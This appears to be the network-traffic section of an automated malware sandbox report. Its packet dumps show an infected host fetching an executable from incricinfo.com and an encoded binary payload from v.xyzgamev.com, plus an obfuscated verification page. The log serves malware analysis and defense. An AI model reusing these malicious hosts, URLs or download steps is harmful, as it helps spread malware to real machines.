                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b
                                                                                                                          Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[])+(+![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])), east=+((+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+
                                                                                                                          May 21, 2022 09:31:13.519010067 CEST2215INData Raw: 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f
                                                                                                                          Data Ascii: !+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystate


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          42192.168.2.449772103.147.182.4280
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          May 21, 2022 09:31:14.274044037 CEST2216OUTGET
                                                                                                                          Data Raw:
                                                                                                                          Data Ascii:
                                                                                                                          May 21, 2022 09:31:14.466432095 CEST2216OUTData Raw: 2f 32 2f 64 61 74 61 36 34 5f 36 2e 65 78 65 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 69 6e 63 72 69 63 69 6e 66 6f 2e 63 6f 6d 0d 0a 2a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 2a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                          Data Ascii: /2/data64_6.exe HTTP/1.0Host: incricinfo.com*Accept: */**Connection: closeUser-Agent: Firefox-3.0
                                                                                                                          May 21, 2022 09:31:14.659001112 CEST2218INHTTP/1.1 200 OK
                                                                                                                          Date: Sat, 21 May 2022 07:31:13 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 1365
                                                                                                                          Connection: close
                                                                                                                          Server: imunify360-webshield/1.18
                                                                                                                          Last-Modified: Saturday, 21-May-2022 07:31:13 GMT
                                                                                                                          Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0
                                                                                                                          cf-edge-cache: no-cache
                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72
                                                                                                                          Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[])+(+!+[]+!![]+!![]+[])+(+!+[]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+[])), east=+((+!+[])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[])+(+!+[]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+[])), x=function(){tr
                                                                                                                          May 21, 2022 09:31:14.659030914 CEST2218INData Raw: 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3b 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 21 21 30 3b 7d 20 7d 2c 0a 20 20 20 20 20 20 20 20 79 3d 66 75 6e 63 74 69 6f 6e 28 79 2c
                                                                                                                          Data Ascii: y{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystatechange",y);}; y(function(){ document.getElementById('w


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          5192.168.2.449799151.115.10.1443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          6192.168.2.44980037.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          7192.168.2.44980137.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          8192.168.2.449802151.115.10.1443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          9192.168.2.44980937.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          HTTPS Proxied Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          0192.168.2.449758172.67.188.70443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:30:54 UTC0OUTGET /23.html HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                          Host: v.xyzgamev.com
                                                                                                                          2022-05-21 07:30:55 UTC0INHTTP/1.1 200 OK
                                                                                                                          Date: Sat, 21 May 2022 07:30:55 GMT
                                                                                                                          Content-Length: 571382
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Mon, 02 May 2022 05:43:52 GMT
                                                                                                                          ETag: "8b7f6-5de00e09305c5"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JqXkCDzwO%2BZRdLcmDgFb91SeQYGRxmfEJKSNY9OaguoEHscbfZTRtVbY0JXgOJO4zgn6tihCAsYUckjIx7aSlwykSF9sG%2Fo500Q6nyxDbP4a5wl%2B23aFWoG17Y3AEHgI0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 70eb9c054c85e688-LHR
                                                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                          2022-05-21 07:30:55 UTC0INData Raw: 6a 2d cc 00 48 68 a2 6a 1e ff 91 3f e8 eb cf 4f 7d 33 e8 e1 38 76 2c 29 63 6d 6c 91 54 2f f0 cc da e3 13 56 f7 72 dc 93 17 ef b9 d6 f6 6e a7 3f 79 0d 18 6f 7a 23 56 af da b4 fe ed f5 98 4e ff 7b 1f d0 a6 ee ed e2 21 f0 cc cb f9 59 17 22 e3 9a d9 29 76 85 54 92 2e d7 2e dd 9b 1f e8 dc a4 ee 55 62 a7 56 d4 d4 2a db a9 29 c5 95 9d 38 94 ca 85 2c 17 25 16 7b 34 c2 79 57 72 41 ec 61 33 36 26 1a 18 2c e3 bc fe 18 56 f0 be ea f2 a2 6c 39 fc 79 0d c0 a4 e6 33 39 fc 79 0d ca 07 77 57 a6 6a f4 6f 78 ae 06 0d f6 e7 49 9f 9c 3b 86 aa 25 f7 11 70 b7 62 0c e8 3e da cb 6a a7 82 b6 92 a6 6a 1e 88 61 77 54 92 dc 72 a2 86 a6 6a 2e a6 12 17 6f f7 2f c5 8e 37 d4 17 dd 9a 2c 3d 75 6b a7 e1 69 df d2 2f 68 e1 eb a3 a6 6a 2a 6a ee 50 a6 6a 09 c4 88 3f e2 a5 2d 58 11 6b a7 d2 52
                                                                                                                          Data Ascii: j-Hhj?O}38v,)cmlT/Vrn?yoz#VN{!Y")vT..UbV*)8,%{4yWrAa36&,Vl9y39ywWjoxI;%pb>jjawTrj.o/7,=uki/hj*jPj?-XkR
                                                                                                                          2022-05-21 07:30:55 UTC1INData Raw: 79 8b ca 3d 7c 36 16 cb 25 d7 b3 d0 7a 2f af e9 18 f8 08 e8 12 13 73 d7 7f ba e6 3e a5 6a db 2d 73 f3 6b d7 da 2f 13 3a e9 1b d6 ff d5 a2 12 11 fb d7 c9 3e 7c 2f 81 0e d6 68 a7 16 e0 be 32 2f 13 14 52 e6 84 c5 2d f3 1b c5 0d c7 00 6b a2 ba c9 d2 39 fc 79 0d ca 07 ef ce a7 6a c3 af 36 5a a7 6a f4 6f c2 af d8 ae 06 0d 6c 26 fc fa 25 f3 55 44 e3 2e 60 e8 02 c6 eb 26 eb e1 74 3e 22 96 36 67 fa de a7 6a 2c a2 d4 d1 e2 2f 57 3d 00 fa 35 a6 16 15 6e 14 f1 00 2e be 0a 11 58 0e cf 99 68 3e cb 9f 6b c7 c4 27 e8 96 2e c8 7c 2f 68 e1 a5 ec a7 6a 66 44 58 f3 53 ef d4 1f 60 26 2a e4 f4 c4 59 e7 d4 bc 0e 14 29 55 5d 62 63 5b fa 04 16 14 1b 15 27 28 86 89 6c e5 db af 2b f1 c5 bc 0a a9 62 17 69 d3 d6 db 8b f3 5b e7 d4 a6 c0 49 66 21 53 e7 d4 96 c0 72 2e a6 16 e8 ec dc 69
                                                                                                                          Data Ascii: y=|6%z/s>j-sk/:>|/h2/R-k9yj6Zjol&%UD.`&t>"6gj,/W=5n.Xh>k'.|/hjfDXS`&*Y)U]bc['(l+bi[If!Sr.i
                                                                                                                          2022-05-21 07:30:55 UTC2INData Raw: a6 1a 91 6a 2f 6f 25 a8 af e8 ae 0e de 08 c0 12 01 fc 33 7b d7 ca 3d 7a e1 a0 e9 a7 6a 2c a4 1a 11 41 ff 57 e9 1c 52 d3 5c 66 8c 36 9e 2c 29 e4 e0 23 2f 1e 16 ad d2 d0 41 49 ec e4 a8 a6 af 31 68 0a c0 1e 03 e2 de 8b b9 61 d3 d8 b4 16 07 2a 7f 3d b4 02 11 61 df 1d a1 7b cf 96 49 47 6b 6e 29 7b cb d8 b4 1a 01 1d 53 d2 db e0 2a 70 f5 2f ec e2 df 54 67 fb 36 e2 4c 14 c9 a0 6a 6b 82 f5 94 e4 d5 53 3d dc 53 cc 68 5a c2 0e 42 f5 2f 12 0c e7 6a a2 c3 8f d5 cf ea 27 6a f4 6f 0e c0 2e 85 54 41 4f 5a 54 ea bc 6e a6 bf c9 d2 39 79 9a 84 a4 32 37 ff a2 bd c9 1b 6a 67 af 5c 91 62 ae 5c 7c 0b 58 1a a7 e8 42 43 ea 6d a1 3d cc 52 cc 67 40 a2 0a 8a a5 49 8d 61 a6 65 a9 6a 87 4e a3 6a a5 10 dc 1f be 66 c6 68 a7 7a 8a d7 37 4a 17 e3 2f ef 22 ee a2 63 ab 6f 24 6a 2b e0 21 69
                                                                                                                          Data Ascii: j/o%3{=zj,AWR\f6,)#/AI1ha*=a{IGkn){S*p/Tg6LjkS=ShZB/j'jo.TAOZTn9y27jg\b\|XBCm=Rg@IaejNjfhz7J/"co$j+!i
                                                                                                                          2022-05-21 07:30:55 UTC4INData Raw: a7 6a e5 76 27 a8 a8 0b c4 25 fb c4 4d 0b e1 5c d7 18 63 f6 a8 36 69 24 5d 25 ad 5c 5c 99 1c 22 54 67 8e 42 be 03 d7 6e 47 8b 68 71 7c 6a e8 fe 7c a3 96 8f ac fb 6f cb 62 ca 0b 7a be 7a 97 5c 83 16 cd 62 ff c5 8f cd 96 5c 5b 94 da ea a4 fc a6 26 f6 64 b7 f1 92 ca f6 2a 2c a4 0a bf 5a 2a 1d 25 a2 2f 6d e3 f5 ae 16 1b 97 3a cb 30 a1 32 70 80 a2 da 07 6e bc b5 75 f1 ea e8 fd c6 36 7b 68 e3 01 8b 97 78 21 1f 48 50 23 d8 1b 65 14 1d f3 ba 51 a4 3f c5 8b eb f5 7f 92 7c 96 9f 55 6b c6 0d d5 85 62 6b ca 99 3c b2 64 0a 57 8d cf 6b 7a 21 90 21 13 29 94 0f 42 90 fc b0 69 3f d7 4d 95 4f e3 f5 f5 74 52 51 69 7d 4a 57 e7 2a 24 d2 9c 1f d8 15 d1 79 b7 6a 22 19 25 ec de ac e6 66 1f 01 39 45 d5 8d b1 06 3a 3b ea a1 25 fd 68 b6 8c 86 b1 79 66 ff a0 fa 39 dc fa 9b e6 1f fc
                                                                                                                          Data Ascii: jv'%M\c6i$]%\\"TgBnGhq|j|obzz\b\[&d*,Z*%/m:02pnu6{hx!HP#eQ?|Ukbk<dWkz!!)Bi?MOtRQi}JW*$yj"%f9E:;%hyf9
                                                                                                                          2022-05-21 07:30:55 UTC5INData Raw: 92 b3 39 7f bc f6 ef 63 df da ef 7c ce d1 50 54 f1 77 04 42 37 38 b8 b7 e0 68 3f 3f e2 e2 3c e2 33 1e 1c 30 0e 94 95 d1 be f6 e5 e4 5b df e3 da eb d8 11 0f 35 2f 3c 76 68 a5 6a a8 d3 91 7e 2c 75 a7 7a 3c 94 da 9d 7c cb 28 18 df 63 fd 39 84 a1 1d 06 9b 68 a7 59 46 3b e0 aa 28 19 5f 53 cb 33 a4 e3 fa b1 a7 6a a7 e1 e3 8e 7b 17 29 60 a9 e7 63 22 92 d6 6d a0 6e 2b 58 ae c9 33 d9 f7 a1 42 67 6b be cb cc f4 88 18 40 76 4c ab 9c 96 2a 23 e6 2b 69 66 66 43 50 76 66 ab 67 f9 d7 c3 6b 23 43 8b ae 22 bc b2 2c 92 d2 a2 ee 30 a1 6d 18 82 a1 23 ea 68 24 2d 77 fb 32 ba 68 e1 aa 63 3c 26 18 26 81 d5 9b 63 ab a8 24 3c bb 67 eb 10 78 f4 4a d7 3f d7 b1 fb 05 f5 53 65 62 cb f6 0a e4 d5 13 bb 09 64 8a 59 54 93 db 23 dd 3a 01 ea 93 66 17 a2 dc 14 ee 14 dd 94 ba 9b bd 28 b5 b7
                                                                                                                          Data Ascii: 9c|PTwB78h??<30[5/<vhj~,uz<|(c9hYF;(_S3j{)`c"mn+X3Bgk@vL*#+iffCPvfgk#C",0m#h$-w2hc<&&c$<gxJ?SebdYT#:f(
                                                                                                                          2022-05-21 07:30:55 UTC6INData Raw: 1e f6 82 94 4d 43 5b b4 7e a9 25 2c 83 8f 2d 27 a6 2b e5 bf d2 0f 61 2b 9d f2 82 ad 27 28 db 12 f9 f7 06 13 3d eb 47 91 fc 3e 5b 04 94 1f 49 45 f0 48 dd 0c 07 a2 a2 1f 81 d4 44 56 b1 0e 4f 92 16 db fa e2 74 6f a6 b6 d5 18 ab 9c df 67 2e 50 41 3b 22 2f 13 12 6c af a3 4d 80 e7 24 32 08 c4 fe 06 48 66 b1 f1 20 78 69 3b 15 d9 a5 7a 0d d2 17 d0 21 68 79 3b 2e ae 16 0d de 89 f7 24 b8 cf 01 68 ab ea a5 b4 f6 4d b1 db b6 fe 4b 82 9b 63 c3 34 ff 54 cd f8 e7 9a ed 01 cc 00 cf c2 25 47 f8 1c 36 38 e2 d3 f9 7d c4 6d 9b a2 d6 ba a5 b9 76 db c3 bf de 52 05 03 27 9e 6e 0d 57 9c fc 26 62 2f 1f c6 f8 e7 11 eb fe 54 d1 2a c5 39 f1 7c 96 4b 67 8a 87 93 5b 06 ff 7f 83 58 5d 26 e2 f5 38 a5 31 32 38 bf ed ba f7 0f 90 ff 77 6d b2 1f 96 e1 dd 64 4d 8e 19 53 58 11 43 3c eb 5e 0a
                                                                                                                          Data Ascii: MC[~%,-'+a+'(=G>[IEHDVOtog.PA;"/lM$2Hf xi;z!hy;.$hMKc4T%G68}mvR'nW&b/T*9|Kg[X]&8128wmdMSXC<^
                                                                                                                          2022-05-21 07:30:55 UTC8INData Raw: ab 54 db 2f 27 a3 ba 28 b6 9a 0e dd 69 db 96 90 a7 2c 2b d2 d7 69 45 44 a0 de 52 2e a4 8c 09 b8 3b d6 55 ac 7f 31 2c 2e 95 ab d1 a8 75 f6 6b e8 74 31 7d 37 6a a7 6a 54 96 d6 55 b6 1a e1 03 7e 3b 80 ca c7 05 1f 99 64 63 28 5b 38 42 a4 ee bf f1 24 aa 78 b4 9e 91 27 09 bb 86 b8 ca 8f 65 2f 56 12 64 b4 ef b6 7e 38 66 9c d6 b3 fb e2 de d3 79 e4 d2 3c 37 8b 68 24 71 fb aa 64 af 81 4e 8d 40 2c e3 e1 6e 64 29 63 3e 1f 1f 39 5f 18 e2 a3 33 b2 ae af c3 74 6a a7 15 e1 eb e4 6e f7 d2 a4 81 8b 4e 24 64 06 4e a8 0f cd 3a 7c f1 bf 9d 09 23 b8 60 ba 85 0a 3a a9 65 a9 ea 7d 59 a9 01 f4 38 f7 b1 1c a5 0e 18 08 2e 6c 86 19 3d 92 ae bc 83 96 af 49 f9 a9 f3 bb 50 9d e9 22 e7 24 d2 47 c5 09 33 ac 47 80 6c 88 41 b3 75 ea df d4 27 3e 6b ca 94 6a 31 14 2d 25 45 a5 e1 c9 af da f5
                                                                                                                          Data Ascii: T/'(i,+iEDR.;U1,.ukt1}7jjTU~;dc([8B$x'e/Vd~8fy<7h$qdN@,nd)c>9_3tjnN$dN:|#`:e}Y8.l=IP"$G3GlAu'>kj1-%E
                                                                                                                          2022-05-21 07:30:55 UTC9INData Raw: 30 10 56 62 d5 1c 28 e7 4a 83 2e 27 31 01 44 c0 e3 9f 65 7d 71 ab 70 bc 2c a7 f1 f7 2e 2c de 92 68 10 f0 23 cb ae 37 11 54 39 e2 e4 36 40 0f 6f 19 82 c7 27 d4 14 dc 6c 38 a0 af 8a 02 23 2a ab 18 6b a6 6a 27 1a 4a 51 47 53 d9 00 c0 00 41 e3 c1 f1 3c b4 3e d5 b5 30 03 eb dd e1 d1 03 0d 9a e4 37 03 ef 42 ac 9a ff dd e0 20 39 07 e2 50 04 c3 6c c5 7b 95 06 f8 59 14 c1 ce 21 25 d9 59 9f 5d c3 d0 5d 85 69 ad ea e2 a5 e6 2d ae e9 2e 51 c8 69 a5 93 e7 32 bb a7 24 84 ee 28 b1 3a e1 1d b1 85 22 1e de bb 11 0b a1 69 fa 7c 6b e6 c6 f6 92 b4 f0 14 57 b3 74 f7 16 95 33 a4 ee c6 7d 2d 5b 8c f7 1d 93 d3 2e 2e 26 4b 44 54 98 68 c7 34 eb 02 4b 5d 79 00 d2 4d 0b a0 1a ad 5d d8 f1 4f 8c 89 ec 10 5a 1c f6 ca 24 93 7d 3e f3 c2 e4 f3 1e 96 e7 19 01 e4 ac ef 34 90 f2 6d 4d 38 a5
                                                                                                                          Data Ascii: 0Vb(J.'1De}qp,.,h#7T96@o'l8#*kj'JQGSA<>07B 9Pl{Y!%Y]]i-.Qi2$(:"i|kWt3}-[..&KDTh4K]yM]OZ$}>4mM8
